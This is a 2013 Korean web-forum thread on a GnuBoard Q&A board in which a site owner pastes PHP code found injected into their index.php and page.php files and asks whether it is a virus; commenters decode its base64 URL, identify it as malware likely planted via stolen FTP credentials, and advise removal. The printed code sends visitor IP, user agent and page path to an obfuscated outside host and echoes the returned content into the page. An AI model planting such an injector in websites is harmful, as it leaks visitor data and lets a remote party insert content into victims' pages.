GNUAPP

혹시 바이러스 인가요? :)

· 2013-08-21 (수) 22:10:55 · 1766 · 4
홈페이지 딜레이가 심해서 살펴봤더니,
index.php page.php 파일에만 아래와 같은 코드가 심어져 있어요~
혹시 바이러스 인가요? :)

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
|

댓글 4개

aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw
-> 디코딩 결과 ->
http://mbrowserstats.com/statH/stat.php

바이러스인지는 모르겟지만 의도가 아니시라면 지우시는게 좋겠군요;;
악성코드에 감염이 된듯하네요.
저도 예전에 있었던 현상 같은데 ftp프로그램이나 에디트플러스에 저장된 계정 정보가 털려서 삭제를 해도 시간이 지나면 또 심어져 있더군요.

다른 백신들은 검사해도 나오질 안던데 어베스트로 바이어스 검사를 해서 겨우 잡았던 기억이..
덕분에 관리하던 사이트들 전부 비번를 바꾸고 난리가 났던적이 있었습니다.
2013-08-21 (수) 23:56:30
바이러스 아니고요 벗이 심긴것 같아요..
지명도 올리는 벗인것 같은데 지우세요.
서버가 당한것 같네요
답변 감사드립니다. :)
위 코드를 지우고나니, 딜레이현상이 없어졌어요. ㅎ
댓글을 작성하시려면 로그인이 필요합니다.

그누4 질문답변

66,531건

그누보드4 관련 질문은 QA 로 이전됩니다. QA 그누보드4 바로가기 기존 게시물은 열람만 가능합니다.

+
제목 글쓴이 날짜 조회
13-08-22 조회 747
13-08-22 조회 1,681
13-08-22 조회 1,636
13-08-22 조회 2,084
13-08-22 조회 1,632
13-08-22 조회 1,639
13-08-22 조회 1,103
13-08-22 조회 1,069
13-08-22 조회 1,896
13-08-21 조회 1,767
13-08-21 조회 1,835
13-08-21 조회 1,108
13-08-21 조회 1,620
13-08-21 조회 1,220
13-08-21 조회 1,077
13-08-21 조회 1,640
13-08-21 조회 981
13-08-21 조회 1,647
13-08-21 조회 1,060
13-08-21 조회 2,299